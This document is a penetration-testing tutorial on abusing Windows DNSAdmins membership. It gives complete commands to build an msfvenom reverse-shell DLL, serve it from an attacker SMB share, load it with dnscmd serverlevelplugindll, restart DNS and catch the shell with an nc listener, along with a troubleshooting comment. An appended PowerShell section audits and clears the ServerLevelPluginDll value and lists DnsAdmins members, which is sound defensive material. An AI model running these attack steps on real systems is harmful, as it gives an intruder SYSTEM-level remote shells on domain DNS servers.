# DNSAdmin Escalation

Here, what we're doing is:

1. Making a DLL payload with msfvenom that sends a reverse shell back to our machine.
2. Serving it over an SMB server so it is reachable from the Windows machine. (You can use any other way to transfer it to the remote machine, but be careful: it might get nuked by the antivirus.) We will also set up a netcat listener to catch the reverse shell.
3. Importing that DLL into the DNS server.
4. Restarting the DNS server so that it loads the DLL.

Checking if your user is a part of the DNSAdmins group:

```bash
whoami /all
```

Now, on to the fun part:

```bash
# making the payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.211.55.13 LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll
```

Because the Windows machine has a 64-bit architecture, we use the x64 payload.

```bash
# serving the file over SMB with smbserver.py, which ships with python3-impacket

cd /usr/share/doc/python3-impacket/examples
./smbserver.py SHARE ~/windows/privesc/
```

In another terminal tab, set up a netcat listener to catch the reverse shell:

```bash
nc -nvlp 4444
```

Now, on the compromised Windows machine:

```cmd
REM Importing the plugin:

dnscmd.exe myserver.local /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll

REM Restarting the service:

sc.exe stop dns
sc.exe start dns
```

Now go back and check the netcat listener; you should have a reverse shell.
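The `dnscmd /config /serverlevelplugindll` command above writes the `ServerLevelPluginDll` value under the DNS service's registry parameters, which is what a defender should audit. The following PowerShell is an added example, not part of the original page: it reports that value and flags a UNC path, a missing file or an unsigned DLL, lists the DnsAdmins members who can set it, and clears it. It assumes it runs on the DNS server as an administrator with the ActiveDirectory module installed.

```powershell
# Added example, not from the original page. Run on the DNS server (or via
# Invoke-Command) as an administrator; Get-DnsAdminsMembers assumes the
# ActiveDirectory module is installed.
$DnsParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$PluginValue  = 'ServerLevelPluginDll'   # written by: dnscmd /config /serverlevelplugindll

function Get-DnsPluginDllState {
    # Read the value; an empty or missing value means no plugin is configured.
    $path = (Get-ItemProperty -Path $DnsParamsKey -Name $PluginValue -ErrorAction SilentlyContinue).$PluginValue
    if ([string]::IsNullOrWhiteSpace($path)) {
        return [pscustomobject]@{ Configured = $false; Path = $null; Findings = @() }
    }
    $findings = @()
    if ($path -like '\\*') {
        # A UNC path means the DNS service (running as SYSTEM) loads code from a share.
        $findings += 'plugin is loaded from a network share'
    } elseif (-not (Test-Path -LiteralPath $path)) {
        $findings += 'configured plugin file does not exist on disk'
    } elseif ((Get-AuthenticodeSignature -FilePath $path).Status -ne 'Valid') {
        $findings += 'plugin DLL is unsigned or its signature is invalid'
    }
    [pscustomobject]@{ Configured = $true; Path = $path; Findings = $findings }
}

function Get-DnsAdminsMembers {
    # Members of this group can set the value above, so review them regularly.
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object Name, objectClass, distinguishedName
}

function Clear-DnsPluginDll {
    # Remediation: remove the value and restart the service so the DLL is unloaded.
    Remove-ItemProperty -Path $DnsParamsKey -Name $PluginValue -ErrorAction SilentlyContinue
    Restart-Service -Name DNS
}

$state = Get-DnsPluginDllState
if ($state.Configured) {
    Write-Warning ("ServerLevelPluginDll is set to '{0}'" -f $state.Path)
    $state.Findings | ForEach-Object { Write-Warning "  - $_" }
} else {
    Write-Output 'No DNS server plugin DLL configured.'
}
Get-DnsAdminsMembers | Format-Table -AutoSize
```

Because the DLL is only loaded when the DNS service starts, a change to this registry value followed by a DNS service restart is the sequence worth alerting on.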

#### Comment: Change domain.local to the IP when you get RPC Error 1772. Found that the FQDN didn't work; the IP of the DNS server worked a treat.

```cmd
dnscmd.exe 10.0.0.1 /config /serverlevelplugindll \\10.211.55.13\share\plugin.dll
```

#### Observation: access denied when restarting the DNS service prior to successfully running the above command.

